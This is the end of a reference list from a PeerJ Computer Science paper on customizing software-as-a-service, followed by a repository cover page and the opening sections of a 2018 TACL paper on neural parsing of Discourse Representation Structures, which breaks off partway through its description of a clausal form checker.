2009. A Quality model for evaluating software- as-a-service in cloud computing. In: 2009 seventh ACIS international confer- ence on software engineering research, management and applications. 261–266 DOI 10.1109/SERA.2009.43. Lee S, Park SB, Lim GG. 2013. Using balanced scorecards for the evaluation of Software- as-a-service. Information & Management 50(7):553–561 DOI 10.1016/j.im.2013.07.006. Lee W, Choi M. 2012. A multi-tenant web application framework for SaaS. In: 2012 IEEE fifth international conference on cloud computing. Piscataway: IEEE, 970–971 DOI 10.1109/CLOUD.2012.27. Li H, Shi Y, Li Q. 2009. A multi-granularity customization relationship model for SaaS. In: 2009 International conference on web information systems and mining. 611–615 DOI 10.1109/WISM.2009.128. Liu W, Zhang B, Liu Y, Wang D, Zhang Y. 2010. New model of SaaS: SaaS with tenancy agency. In: 2010 2nd international conference on advanced computer control, 463–466 DOI 10.1109/ICACC.2010.5486635. Logue MD, Effken JA. 2013. Validating the personal health records adoption model using a modified e-Delphi. Journal of Advanced Nursing 69(3):685–696 DOI 10.1111/j.1365-2648.2012.06056.x. Luo W, Strong DM. 2004. A framework for evaluating ERP implementation choices. IEEE Transactions on Engineering Management 51(3):322–333 DOI 10.1109/TEM.2004.830862. Lynn MR. 1986. Determination and quantification of content validity. Nursing Research 35(6):382–385 DOI 10.1097/00006199-198611000-00017. Makki M, Van Landuyt D, Walraven S, Joosen W. 2016. Scalable and manageable customization of workflows in multi-tenant saas offerings. In: Proceedings of the 31st Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 29/34 https://peerj.com http://dx.doi.org/10.3923/jas.2014.3613.3619 http://dx.doi.org/10.1109/MINES.2010.57 http://dx.doi.org/10.1109/SCC.2015.37 http://dx.doi.org/10.1109/SCC.2013.30 http://dx.doi.org/10.1016/j.techfore.2005.09.002 http://dx.doi.org/10.1109/SERA.2009.43 http://dx.doi.org/10.1016/j.im.2013.07.006 http://dx.doi.org/10.1109/CLOUD.2012.27 http://dx.doi.org/10.1109/WISM.2009.128 http://dx.doi.org/10.1109/ICACC.2010.5486635 http://dx.doi.org/10.1111/j.1365-2648.2012.06056.x http://dx.doi.org/10.1109/TEM.2004.830862 http://dx.doi.org/10.1097/00006199-198611000-00017 http://dx.doi.org/10.7717/peerj-cs.294 annual ACM symposium on applied computing, SAC ’16. New York: ACM, 432–439 DOI 10.1145/2851613.2851627. Manford C. 2008. The impact of the SaaS model of software delivery. In: Proceedings of the 21st annual NACCQ conference, NACCQ, Auckland, New Zealand. 283–286. Mathiassen L, Sandberg AB. 2014. Process mass customization in a global software firm. IEEE Software 31(6):62–69 DOI 10.1109/MS.2014.21. Mietzner R, Leymann F. 2008. Generation of BPEL customization processes for SaaS applications from variability descriptors. In: 2008 IEEE international conference on services computing, vol. 2, 359–366 DOI 10.1109/SCC.2008.85. Mietzner R, Leymann F, Papazoglou MP. 2008. Defining composite configurable SaaS application packages using SCA, variability descriptors and multi-tenancy patterns. In: 2008 third international conference on Internet and web applications and services, 156–161 DOI 10.1109/ICIW.2008.68. Moens H, De Turck F. 2014. Feature-based application development and management of multi-tenant applications in clouds. In: Proceedings of the 18th international software product line conference - volume 1, SPLC ’14. New York: ACM, 72–81 DOI 10.1145/2648511.2648519. Moens H, Dhoedt B, De Turck F. 2015. Allocating resources for customizable multi- tenant applications in clouds using dynamic feature placement. Future Generation Computer Systems 53(C):63–76 DOI 10.1016/j.future.2015.05.017. Moens H, Truyen E, Walraven S, Joosen W, Dhoedt B, De Turck F. 2012. Developing and managing customizable Software as a Service using feature model conversion. In: 2012 IEEE network operations and management symposium. Piscataway: IEEE, 1295–1302 DOI 10.1109/NOMS.2012.6212066. Mohamed F, Abu-Matar M, Mizouni R, Al-Qutayri M, Mahmoud ZA. 2014. SaaS dynamic evolution based on model-driven software product lines. In: 2014 IEEE 6th international conference on cloud computing technology and science. Piscataway: IEEE, 292–299 DOI 10.1109/CloudCom.2014.131. Mubarak N, Hatah E, Aris MAM, Shafie AA, Zin CS. 2019. Consensus among health- care stakeholders on a collaborative medication therapy management model for chronic diseases in Malaysia; a Delphi study. PLOS ONE 14(5):e0216563 DOI 10.1371/journal.pone.0216563. Müller J, Krüger J, Enderlein S, Helmich M, Zeier A. 2009. Customizing enterprise soft- ware as a service applications: back-end extension in a multi-tenancy environment. Berlin, Heidelberg: Springer Berlin Heidelberg, 66–77. Nadanam P, Rajmohan R. 2012. QoS evaluation for web services in cloud computing. In: 2012 third international conference on computing, communication and networking technologies (ICCCNT’12). 1–8 DOI 10.1109/ICCCNT.2012.6395991. Nguyen T, Colman A, Han J. 2016. A feature-based framework for developing and provisioning customizable web services. IEEE Transactions on Services Computing 9(4):496–510 DOI 10.1109/TSC.2015.2405546. Parhizkar M. 2016. Impact analysis of enterprise resource planning post-implementation modifications. PhD thesis, City, University of London. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 30/34 https://peerj.com http://dx.doi.org/10.1145/2851613.2851627 http://dx.doi.org/10.1109/MS.2014.21 http://dx.doi.org/10.1109/SCC.2008.85 http://dx.doi.org/10.1109/ICIW.2008.68 http://dx.doi.org/10.1145/2648511.2648519 http://dx.doi.org/10.1016/j.future.2015.05.017 http://dx.doi.org/10.1109/NOMS.2012.6212066 http://dx.doi.org/10.1109/CloudCom.2014.131 http://dx.doi.org/10.1371/journal.pone.0216563 http://dx.doi.org/10.1109/ICCCNT.2012.6395991 http://dx.doi.org/10.1109/TSC.2015.2405546 http://dx.doi.org/10.7717/peerj-cs.294 Parratt JA, Fahy KM, Hutchinson M, Lohmann G, Hastie CR, Chaseling M, OBrien K. 2016. Expert validation of a teamwork assessment rubric: a modified Delphi study. Nurse Education Today 36:77–85 DOI 10.1016/j.nedt.2015.07.023. Parthasarathy S, Sharma S. 2016. Efficiency analysis of ERP packages-a customization perspective. Computers in Industry 82:19–27 DOI 10.1016/j.compind.2016.05.004. Parthasarathy S, Sharma S. 2017. Impact of customization over software quality in ERP projects: an empirical study. Software Quality Journal 25(2):581–598 DOI 10.1007/s11219-016-9314-x. Polit DF, Beck CT. 2006. The content validity index: are you sure you know what’s being reported? Critique and recommendations. Research in Nursing & Health 29(5):489–497 DOI 10.1002/nur.20147. Publications Service Management. 2008. Information technology infrastructure library (ITIL v3). London: Publications Service Management. Ralph M. 2008. Using variability descriptors to describe customizable SaaS application templates. Institute of Architecture of Application Systems 1–27. Rico A, Noguera M, Garrido JL, Benghazi K, Barjis J. 2016. Extending multi-tenant architectures: a database model for a multi-target support in SaaS applications. Enterprise Information System 10(4):400–421 DOI 10.1080/17517575.2014.947636. Rolia J, Krishnamurthy D, Xu M, Graupner S. 2008. APE: an automated performance engineering process for software as a service environments. Report HPL-2008-65, HP Labs, HP Labs. Available at https://www.hpl.hp.com/techreports/2008/HPL-2008- 65.html. Ruehl ST, Andelfinger U. 2011. Applying software product lines to create customiz- able software-as-a-service applications. In: Proceedings of the 15th international software product line conference, volume 2, SPLC ’11. New York: ACM, 16:1–16:4 DOI 10.1145/2019136.2019154. Ruehl ST, Wache H, Verclas SAW. 2013. Capturing customers’ requirements towards mixed-tenancy deployments of saas-applications. In: 2013 IEEE sixth international conference on cloud computing. Piscataway: IEEE, 462–469 DOI 10.1109/CLOUD.2013.42. Salama M, Shawish A, Zeid A, Kouta M. 2012. Integrated QoS utility-based model for cloud computing service provider selection. In: 2012 IEEE 36th annual com- puter software and applications conference workshops. Piscataway: IEEE, 45–50 DOI 10.1109/COMPSACW.2012.18. Saleh AI, Fouad MA, Abu-Elkheir M. 2014. Classifying requirements for variability optimization in multitenant applications. In: 2014 IEEE 6th international conference on cloud computing technology and science. 32–37 DOI 10.1109/CloudCom.2014.142. Salih NK, Zang T. 2012. Variable service process by feature meta-model for SaaS application. In: 2012 International conference on green and ubiquitous technology. 102–105 DOI 10.1109/GUT.2012.6344158. Salih NK, Zang T. 2016. Modeling and self-configuring SaaS application, CoRR. ArXiv preprint. arXiv:1606.05991. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 31/34 https://peerj.com http://dx.doi.org/10.1016/j.nedt.2015.07.023 http://dx.doi.org/10.1016/j.compind.2016.05.004 http://dx.doi.org/10.1007/s11219-016-9314-x http://dx.doi.org/10.1002/nur.20147 http://dx.doi.org/10.1080/17517575.2014.947636 https://www.hpl.hp.com/techreports/2008/HPL-2008-65.html https://www.hpl.hp.com/techreports/2008/HPL-2008-65.html http://dx.doi.org/10.1145/2019136.2019154 http://dx.doi.org/10.1109/CLOUD.2013.42 http://dx.doi.org/10.1109/COMPSACW.2012.18 http://dx.doi.org/10.1109/CloudCom.2014.142 http://dx.doi.org/10.1109/GUT.2012.6344158 http://arXiv.org/abs/1606.05991 http://dx.doi.org/10.7717/peerj-cs.294 Samir A, Darwish NR. 2016. Reusability quality attributes and metrics of SaaS from perspective of business and provider. International Journal of Computer Science and Information Security 14(3):295–312. Scheibler T, Mietzner R, Leymann F. 2008. EAI as a service—combining the power of executable EAI patterns and SaaS. In: 2008 12th international IEEE enterprise distributed object computing conference. Piscataway: IEEE, 107–116 DOI 10.1109/EDOC.2008.21. Schroeter J, Cech S, Goetz S, Wilke C, Aßmann U. 2012. Towards modeling a variable architecture for multi-tenant SaaS-applications. In: Proceedings of the sixth interna- tional workshop on variability modeling of software-intensive systems, VaMoS ’12. New York: ACM, 111–120 DOI 10.1145/2110147.2110160. Sekaran U, Bougie R. 2016. Research methods for business: a skill building. 7 edition. Hoboken: John Wiley & Sons. Shahin AA. 2014. Multi-dimensional customization modelling based on metagraph For Saas multi-tenant applications, CoRR. ArXiv preprint. arXiv:1402.6045. Shen Y, Cui W, Li Q, Shi Y. 2011. Hybrid fragmentation to preserve data privacy for SaaS. In: 2011 eighth web information systems and applications conference. 3–6 DOI 10.1109/WISA.2011.8. Shi Y, Luan S, Li Q, Wang H. 2009. A multi-tenant oriented business process customiza- tion system. In: 2009 international conference on new trends in information and service science. 319–324 DOI 10.1109/NISS.2009.181. Shrotryia VK, Dhanda U. 2019. Content validity of assessment instrument for employee engagement. Sage Open 9(1):2158244018821751. Skulmoski GJ, Hartman FT, Krahn J. 2007. The Delphi method for graduate research. Journal of Information Technology Education: Research 6(1):1–21 DOI 10.28945/199. Song J, Zhang S, Gong Y, Dai B. 2012. A QoS evaluation model for test-bed in the cloud computing environment. In: 2012 IEEE ninth international conference on e-business engineering. Piscataway: IEEE, 292–295 DOI 10.1109/ICEBE.2012.54. Stevens B, McGrath P, Yamada J, Gibbins S, Beyene J, Breau L, Camfield C, Finley A, Franck L, Howlett A, Johnston C, McKeever P, O’Brien K, Ohlsson A. 2006. Identification of pain indicators for infants at risk for neurological impairment: a Delphi consensus study. BMC Pediatrics 6(1):1 DOI 10.1186/1471-2431-6-1. Sun W, Zhang K, Chen S-K, Zhang X, Liang H. 2007. Software as a service: an inte- gration perspective. In: Krämer BJ, Lin K-J, Narasimhan P, eds. Service-oriented computing–ICSOC 2007. Berlin, Heidelberg: Springer Berlin Heidelberg, 558–569. Sun W, Zhang X, Guo CJ, Sun P, Su H. 2008. Software as a service: configuration and customization perspectives. In: 2008 IEEE congress on services part II (services-2 2008). Piscataway: IEEE, 18–25 DOI 10.1109/SERVICES-2.2008.29. Sunikka A, Bragge J. 2008. What, who and where: insights into personalization. In: Proceedings of the 41st annual Hawaii international conference on system sciences (HICSS 2008). 283–283 DOI 10.1109/HICSS.2008.500. Truyen E, Cardozo N, Walraven S, Vallejos J, Bainomugisha E, Günther S, D’Hondt T, Joosen W. 2012. Context-oriented programming for customizable SaaS applications. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 32/34 https://peerj.com http://dx.doi.org/10.1109/EDOC.2008.21 http://dx.doi.org/10.1145/2110147.2110160 http://arXiv.org/abs/1402.6045 http://dx.doi.org/10.1109/WISA.2011.8 http://dx.doi.org/10.1109/NISS.2009.181 http://dx.doi.org/10.28945/199 http://dx.doi.org/10.1109/ICEBE.2012.54 http://dx.doi.org/10.1186/1471-2431-6-1 http://dx.doi.org/10.1109/SERVICES-2.2008.29 http://dx.doi.org/10.1109/HICSS.2008.500 http://dx.doi.org/10.7717/peerj-cs.294 In: Proceedings of the 27th annual ACM symposium on applied computing, SAC ’12. New York: ACM, 418–425 DOI 10.1145/2245276.2245358. Tsai W, Huang Y, Shao Q. 2011. EasySaaS: a SaaS development framework. In: 2011 IEEE international conference on service-oriented computing and applications (SOCA). Piscataway: IEEE, 1–4 DOI 10.1109/SOCA.2011.6166262. Tsai W, Shao Q, Li W. 2010. OIC: ontology-based intelligent customization framework for SaaS. In: 2010 IEEE international conference on service-oriented computing and applications (SOCA). Piscataway: IEEE, 1–8 DOI 10.1109/SOCA.2010.5707139. Tsai W, Sun X. 2013. SaaS multi-tenant application customization. In: 2013 IEEE seventh international symposium on service-oriented system engineering. Piscataway: IEEE, 1–12 DOI 10.1109/SOSE.2013.44. Tsai W-T, Zhong P, Chen Y. 2016. Tenant-centric sub-tenancy architecture in software-as-a-service. CAAI Transactions on Intelligence Technology 1(2):150–161 DOI 10.1016/j.trit.2016.08.002. Van Landuyt D, Walraven S, Joosen W. 2015. Variability middleware for multi- tenant SaaS applications: a research roadmap for service lines. In: Proceedings of the 19th international conference on software product line, SPLC ’15. New York: ACM, 211–215 DOI 10.1145/2791060.2791080. Walraven S. 2014. Middleware and methods for customizable SaaS. PhD thesis, Faculty of Engineering, KU Leuven. Walraven S, Landuyt DV, Truyen E, Handekyn K, Joosen W. 2014. Efficient customiza- tion of multi-tenant Software-as-a-Service applications with service lines. Journal of Systems and Software 91:48–62 DOI 10.1016/j.jss.2014.01.021. Walraven S, Truyen E, Joosen W. 2011. A middleware layer for flexible and cost- efficient multi-tenant applications. In: Kon F, Kermarrec A-M, eds. Middleware 2011. Berlin, Heidelberg: Springer Berlin Heidelberg, 370–389. Wang S, Zheng Z, Sun Q, Zou H, Yang F. 2011. Cloud model for service selection. In: 2011 IEEE conference on computer communications workshops (INFOCOM WKSHPS). Piscataway: IEEE, 666–671 DOI 10.1109/INFCOMW.2011.5928896. Wang Y, Mäntylä M, Eldh S, Markkula J, Wiklund K, Kairi T, Raulamo-Jurvanen P, Haukinen A. 2019. A self-assessment instrument for assessing test automation maturity. In: Proceedings of the evaluation and assessment on software engineering. New York: ACM, 145–154. Wynd CA, Schmidt B, Schaefer MA. 2003. Two quantitative approaches for esti- mating content validity. Western Journal of Nursing Research 25(5):508–518 DOI 10.1177/0193945903252998. Xiaojun R, Yongqing Z, Lanju K. 2013. SaaS template evolution model based on tenancy history. In: 2013 third international conference on intelligent system design and engineering applications. 1242–1247 DOI 10.1109/ISDEA.2012.293. Xin M, Levina N. 2008. Software-as-a-service model: elaborating client-side adoption factors. In: Boland R, Limayem M, Pentland B, eds. Proceedings of the 29th interna- tional conference on information systems. Paris. Yamada J, Stevens B, Sidani S, Watt-Watson J, De Silva N. 2010. Content validity of a process evaluation checklist to measure intervention implementation fidelity Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 33/34 https://peerj.com http://dx.doi.org/10.1145/2245276.2245358 http://dx.doi.org/10.1109/SOCA.2011.6166262 http://dx.doi.org/10.1109/SOCA.2010.5707139 http://dx.doi.org/10.1109/SOSE.2013.44 http://dx.doi.org/10.1016/j.trit.2016.08.002 http://dx.doi.org/10.1145/2791060.2791080 http://dx.doi.org/10.1016/j.jss.2014.01.021 http://dx.doi.org/10.1109/INFCOMW.2011.5928896 http://dx.doi.org/10.1177/0193945903252998 http://dx.doi.org/10.1109/ISDEA.2012.293 http://dx.doi.org/10.7717/peerj-cs.294 of the EPIC intervention. Worldviews on Evidence-Based Nursing 7(3):158–164 DOI 10.1111/j.1741-6787.2010.00182.x. Yang S, Yoo B, Jahng J. 2010. Does the SaaS model really increase customer benefits. Asia Pacific Journal of Information Systems 20(2):87–101. Yilmaz M, O’Connor RV, Colomo-Palacios R, Clarke P. 2017. An examination of personality traits and how they impact on software development teams. Information and Software Technology 86:101–122 DOI 10.1016/j.infsof.2017.01.005. Ying L, Bin Z, Guoqi L, Deshuai W, Yan G. 2010. Personalized modeling for SaaS based on extended WSCL. In: 2010 IEEE Asia-Pacific services computing conference. Piscataway: IEEE, 355–362 DOI 10.1109/APSCC.2010.38. Zamanzadeh V, Ghahramanian A, Rassouli M, Abbaszadeh A, Alavi-Majd H, Nikanfar A-R. 2015. Design and implementation content validity study: development of an instrument for measuring patient-centered communication. Journal of Caring Sciences 4(2):165–178 DOI 10.15171/jcs.2015.017. Zamanzadeh V, Rassouli M, Abbaszadeh A, Majd HA, Nikanfar A, Ghahramanian A. 2014. Details of content validity and objectifying it in instrument development. Nursing Practice Today 1(3):163–171. Zhang Y, Liu S, Meng X. 2009. Towards high level SaaS maturity model: methods and case study. In: 2009 IEEE Asia-Pacific services computing conference (APSCC). 273–278 DOI 10.1109/APSCC.2009.5394111. Zhang K, Zhang X, Sun W, Liang H, Huang Y, Zeng L, Liu X. 2007. A policy-driven approach for software-as-services customization. In: The 9th IEEE international conference on E-commerce technology and the 4th IEEE international conference on enterprise computing, E-Commerce and E-Services (CEC-EEE 2007). Piscataway: IEEE, 123–130 DOI 10.1109/CEC-EEE.2007.9. Zhao S, Zhang Y, Shen B, Shen X, Chen R. 2014. Mass data processing and personal- ized services in Shanghai e-commerce credit evaluation platform. In: 2014 IEEE international conference on progress in informatics and computing. Piscataway: IEEE, 481–485 DOI 10.1109/PIC.2014.6972382. Zia A, Khan MNA. 2012. Identifying key challenges in performance issues in cloud computing. International Journal of Modern Education and Computer Science 4(10):59–68. Ziani D, AlShehri A. 2015. A new framework for customizing ERP systems in a multi tenant SaaS environment. In: 2015 2nd world symposium on web applications and networking (WSWAN). Piscataway: IEEE, 1–7 DOI 10.1109/WSWAN.2015.7209089. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 34/34 https://peerj.com http://dx.doi.org/10.1111/j.1741-6787.2010.00182.x http://dx.doi.org/10.1016/j.infsof.2017.01.005 http://dx.doi.org/10.1109/APSCC.2010.38 http://dx.doi.org/10.15171/jcs.2015.017 http://dx.doi.org/10.1109/APSCC.2009.5394111 http://dx.doi.org/10.1109/CEC-EEE.2007.9 http://dx.doi.org/10.1109/PIC.2014.6972382 http://dx.doi.org/10.1109/WSWAN.2015.7209089 http://dx.doi.org/10.7717/peerj-cs.294 work_ngj3u2h4ubaajm7sugmsj4gobi ---- University of Groningen Exploring Neural Methods for Parsing Discourse Representation Structures van Noord, Rik; Abzianidze, Lasha; Toral Ruiz, Antonio; Bos, Johannes Published in: Transactions of the Association for Computational Linguistics DOI: 10.1162/tacl_a_00241 IMPORTANT NOTE: You are advised to consult the publisher's version (publisher's PDF) if you wish to cite from it. Please check the document version below. Document Version Publisher's PDF, also known as Version of record Publication date: 2018 Link to publication in University of Groningen/UMCG research database Citation for published version (APA): van Noord, R., Abzianidze, L., Toral Ruiz, A., & Bos, J. (2018). Exploring Neural Methods for Parsing Discourse Representation Structures. Transactions of the Association for Computational Linguistics, 6, 619-633. https://doi.org/10.1162/tacl_a_00241 Copyright Other than for strictly personal use, it is not permitted to download or to forward/distribute the text or part of it without the consent of the author(s) and/or copyright holder(s), unless the work is under an open content license (like Creative Commons). Take-down policy If you believe that this document breaches copyright please contact us providing details, and we will remove access to the work immediately and investigate your claim. Downloaded from the University of Groningen/UMCG research database (Pure): http://www.rug.nl/research/portal. For technical reasons the number of authors shown on this cover page is limited to 10 maximum. Download date: 06-04-2021 https://doi.org/10.1162/tacl_a_00241 https://research.rug.nl/en/publications/exploring-neural-methods-for-parsing-discourse-representation-structures(0abd0fff-f63b-44ff-bd7e-a7dc01acc782).html https://doi.org/10.1162/tacl_a_00241 Exploring Neural Methods for Parsing Discourse Representation Structures Rik van Noord Lasha Abzianidze Antonio Toral Johan Bos Center for Language and Cognition, University of Groningen {r.i.k.van.noord, l.abzianidze, a.toral.ruiz, johan.bos}@rug.nl Abstract Neural methods have had several recent successes in semantic parsing, though they have yet to face the challenge of pro- ducing meaning representations based on formal semantics. We present a sequence- to-sequence neural semantic parser that is able to produce Discourse Representation Structures (DRSs) for English sentences with high accuracy, outperforming tradi- tional DRS parsers. To facilitate the learn- ing of the output, we represent DRSs as a sequence of flat clauses and introduce a method to verify that produced DRSs are well-formed and interpretable. We compare models using characters and words as in- put and see (somewhat surprisingly) that the former performs better than the latter. We show that eliminating variable names from the output using De Bruijn indices increases parser performance. Adding silver training data boosts performance even further. 1 Introduction Semantic parsing is the task of mapping a natu- ral language expression to an interpretable mean- ing representation. Semantic parsing used to be the domain of symbolic and statistical approaches (Pereira and Shieber, 1987; Zelle and Mooney, 1996; Blackburn and Bos, 2005). Recently, how- ever, neural methods, and in particular sequence- to-sequence models, have been successfully applied to a wide range of semantic parsing tasks. These include code generation (Ling et al., 2016), question answering (Dong and Lapata, 2016; He and Golub, 2016) and Abstract Meaning Repre- sentation parsing (Konstas et al., 2017). Because these models have no intrinsic knowledge of the structure (tree, graph, set) they have to produce, recent work also focused on structured decod- ing methods, creating neural architectures that always output a graph or a tree (Alvarez-Melis and Jaakkola, 2017; Buys and Blunsom, 2017). These methods often outperform the more general sequence-to-sequence models but are tailored to specific meaning representations. This paper will focus on parsing Discourse Representation Structures (DRSs) proposed in Discourse Representation Theory (DRT), a well- studied formalism developed in formal semantics (Kamp, 1984; Van der Sandt, 1992; Asher, 1993; Kamp and Reyle, 1993; Muskens, 1996; Van Eijck and Kamp 1997; Kadmon, 2001; Asher and Las-carides, 2003), dealing with many semantic phenomena: quantifiers, negation, scope ambi- guities, pronouns, presuppositions, and discourse structure (see Figure 1). DRSs are recursive struc- tures and thus form a challenge for sequence-to- sequence models because they need to generate a well-formed structure and not something that looks like one but is not interpretable. The problem that we try to tackle bears similarities to the recently introduced task of map- ping sentences to an Abstract Meaning Represen- tation (AMR; Banarescu et al. 2013). But there are notable differences between DRS and AMR. Firstly, DRSs contain scope, which results in a more linguistically motivated treatment of modals, quantification, and negation. Secondly, DRSs con- tain a substantially higher number of variable bindings (reentrant nodes in AMR terminol- ogy), which are challenging for learning (Damonte et al., 2017). DRS parsing was attempted in the 1980s for small fragments of English (Johnson and Klein, 1986; Wada and Asher, 1986). Wide-coverage 619 Transactions of the Association for Computational Linguistics, vol. 6, pp. 619–634, 2018. Action Editor: Asli Celikyilmaz. Submission batch: 7/2018; Revision batch: 9/2018; Published 12/2018. c© 2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Raw input: Tom isn’t afraid of anything. System output of a DRS in a clausal form: b1 REF x1 b3 REF s1 b1 male "n.02" x1 b3 Time s1 t1 b1 Name x1 "tom" b3 Experiencer s1 x1 b2 REF t1 b3 afraid "a.01" s1 b2 EQU t1 "now" b3 Stimulus s1 x2 b2 time "n.08" t1 b3 REF x2 b0 NOT b3 b3 entity "n.01" x2 The same DRS in a box format: b0 ¬ s1 x2 b3 afraid.a.01(s1) Time(s1, t1) Stimulus(s1,x2) Experiencer(s1,x1) entity.n.01(x2) x1 b1 male.n.02(x1) Name(x1, tom) t1 b2 time.n.08(t1) t1 = now Figure 1: DRS parsing in a nutshell. Given a raw text, a system has to generate a DRS in the clause format, a flat version of the standard box notation. The semantic representation formats are made more readable by using various letters for variables: the letters x, e, s, and t are used for discourse referents denoting individuals, events, states, and time, respectively, and b is used for variables denoting DRS boxes. DRS parsers based on supervised machine learn- ing emerged later (Bos, 2008b; Le and Zuidema, 2012; Bos, 2015; Liu et al., 2018). The objectives of this paper are to apply neural methods to DRS parsing. In particular, we are interested in answers to the following research questions (RQs): 1. Are sequence-to-sequence models able to produce formal meaning representations (DRSs)? 2. What is better for input: sequences of charac- ters or sequences of words; does tokenization help; and what kind of casing is best used? 3. What is the best way of dealing with variables that occur in DRSs? 4. Does adding silver data increase the perfor- mance of the neural parser? 5. What parts of semantics are learned and what parts of semantics are still challenging? We make the following contributions to seman- tic parsing:1 (a) The output of our parser consists of interpretable scoped meaning representations, 1The code is available here: https://github.com/ RikVN/Neural_DRS. guaranteed by a specially designed checking tool (§3). (b) We compare different methods of repre- senting input and output in §4. (c) We show in §5 that using additional, non-gold standard data can improve performance. (d) We per- form a thorough analysis of the produced out- put and compare our methods with symbolic/ statistical approaches (§6). 2 Discourse Representation Structures 2.1 The Structure of DRS DRSs are meaning representations introduced by DRT (Kamp and Reyle, 1993). In general, a DRS can be seen as an ordered pair 〈A, l :B〉, where A is a set of presuppositional DRSs, and B a DRS with a label l. The presuppositional DRSs A can be viewed as propositions that need to be anchored in the context in order to make the main DRS B true, where presuppositions comprise anaphoric phenomena, too (Van der Sandt, 1992; Geurts, 1999; Beaver, 2002). DRSs are either elementary DRSs or segmented DRSs. An elementary DRS is an ordered pair of a set of discourse referents and a set of con- ditions. There are basic conditions and complex conditions. A basic condition is a predicate ap- plied to constants or discourse referents, whereas a complex condition can introduce Boolean oper- ators ranging over DRSs (negation, conditionals, disjunction). Segmented DRSs capture discourse structure by connecting two units of discourse by a discourse relation (Asher and Lascarides, 2003). 2.2 Annotated Corpora Despite a long tradition of formal interest in DRT, it is only recently that textual corpora annotated with DRSs have been made available. The Gronin- gen Meaning Bank (GMB) is a large corpus with DRS annotation for mostly short English news- paper texts (Basile et al., 2012; Bos et al., 2017). The DRSs in this corpus are produced by an existing semantic parser and then partially corrected. The DRSs in the GMB are therefore not gold standard. A similar corpus is the Parallel Meaning Bank (PMB), which provides DRSs for English, German, Dutch, and Italian sentences based on a parallel corpus (Abzianidze et al., 2017). The PMB, too, is constructed using an existing seman- tic parser, but a part of it is completely manually checked and corrected (i.e., gold standard). In con- trast to the GMB, the PMB involves two major 620 https://github.com/RikVN/Neural_DRS https://github.com/RikVN/Neural_DRS additions: (a) its semantics are refined by mod- eling tense and using semantic tagging (Bjerva et al., 2016; Abzianidze and Bos, 2017), and (b) the non-logical symbols of the DRSs correspond- ing to concepts and semantic roles are grounded in WordNet (Fellbaum, 1998) and VerbNet (Bonial et al., 2011), respectively. These additions make the DRSs of the PMB more fine-grained meaning representations. For this reason we choose the PMB (over the GMB) as our corpus for evaluating our semantic parser. Even though the sentences in the current release of the PMB are relatively short, they contain many difficult semantic phenomena that a seman- tic parser has to deal with: pronoun resolution, quantifiers, scope of modals and negation, multi- word expressions, word senses, semantic roles, presupposition, tense, and discourse relations. As far as we know, we are the first group to use the PMB corpus for semantic parsing. 2.3 Formatting DRSs with Boxes and Clauses The usual way to represent DRSs is the well- known box format. To facilitate reading a DRS with unresolved presuppositions, it can be de- picted as a network of boxes, where a non- presuppositional (i.e., main) DRS l : B is connected to the presuppositional DRSs A with ar- rows. Each box comes with a unique label and has two rows. In the case of elementary DRSs, these rows contain discourse referents in the top row and conditions in the bottom row (Figure 1). A seg- mented DRS has a row with labeled DRSs and a row with discourse relations (Figure 2). The DRS in Figure 1 consists of a main box b0 and two presuppositional boxes, b1 and b2. Note that b0 has no discourse referents but introduces negation via a single condition ¬b3 with a nested box b3. The conditions of b3 represent unary and binary relations over discourse referents that are introduced either by b3 or the presuppositional DRSs. A clausal form is another way of formatting DRSs. It represents a DRS as a set of clauses (see Figures 1 and 2). This format is better suited for machine learning than the box format, as it has a simple, flat structure and facilitates partial matching of DRSs, which is useful for evaluation (van Noord et al., 2018). Conversion from the box notation to the clausal form and vice versa is trans- parent: Discourse referents, conditions, and dis- Figure 2: A segmented DRS. Discourse relations are formatted with uppercase characters. course relations in the clausal form are preceded by the label of the box in which they occur. Notice that the variable letters in the semantic representa- tions are automatically set and they simply serve for readability purposes. Throughout the experi- ments described in this paper, we utilize clausal form DRSs. 3 Method 3.1 Annotated Data We use the English DRSs from release 2.1.0 of the PMB (Abzianidze et al., 2017).2 The release sug- gests using the parts 00, 10, 20, and 30 as the de- velopment set, resulting in 3,998 training and 557 development instances. Basic statistics are shown in Table 1, and the number of occurrences of some of the semantic phenomena mentioned in §2.2 are given in Table 2. Because this is a rather small training set, we tune our model using 10-fold cross-validation (CV) on the training set, rather than tuning on a separate development set. This means that we will use the suggested development set as a test set (and refer to it as such). When testing on this set, we train a model on all available training data. The utilized PMB release also comes with “silver” data—namely, 71,308 DRSs that are only partially 2http://pmb.let.rug.nl/data.php. 621 http://pmb.let.rug.nl/data.php Sentences Tokens Avg tok/sent Gold train 3,998 24,917 6.2 Gold test 557 3,180 5.7 Silver 73,778 638,610 8.7 Table 1: Number of documents, sentences, and to- kens for the English part of PMB release 2.1.0. Note that the number of tokens is based on the PMB tokenization, treating multiword expressions as a single token. Phenomenon Train Test Silver Negation & modals 442 73 17,527 Scope ambiguity ≈67 15 ≈3,108 Pronoun resolution ≈291 31 ≈3,893 Discourse rel. & imp. 254 33 16,654 Embedded clauses ≈160 30 ≈46,458 Table 2: Counts of relevant semantic phenomena for PMB release 2.1.0.3 These phenomena are described and further discussed in §6.3. manually corrected. In addition, we use the DRSs from the silver data but without the manual cor- rections, which makes them “bronze” DRSs (fol- lowing PMB terminology). Our experiments will initially use only the gold standard data, after which we will use the silver or bronze data to fur- ther push the score of our best systems. 3.2 Clausal Form Checker The clausal form of a DRS needs to satisfy a set of constraints in order to correspond to a semanti- cally interpretable DRS, that is, translatable into a first-order logic formula without free occurrences of a variable (Kamp and Reyle, 1993). For ex- ample, all discourse referents need to be explicitly introduced with a REF clause to avoid free occur- rences of variables. We implemented a clausal form checker that validates the clausal form if and only if it rep- resents a semantically interpretable DRS. Distin- guishing box variables from entity variables is crucial for the validity checking, but automatically learned clausal forms are not expected to differen- tiate variable types. First, the checker separately 3The phenomena are automatically counted based on clausal forms. The counting algorithm does not guarantee the exact number for certain phenomena, though it returned the exact counts of all the phenomena on the test data except the pronoun resolution (30). parses each clause in the form to induce variable types based on the fixed set of comparison and DRS operators. After typing all the variables, the checker verifies whether the clauses collectively correspond to a 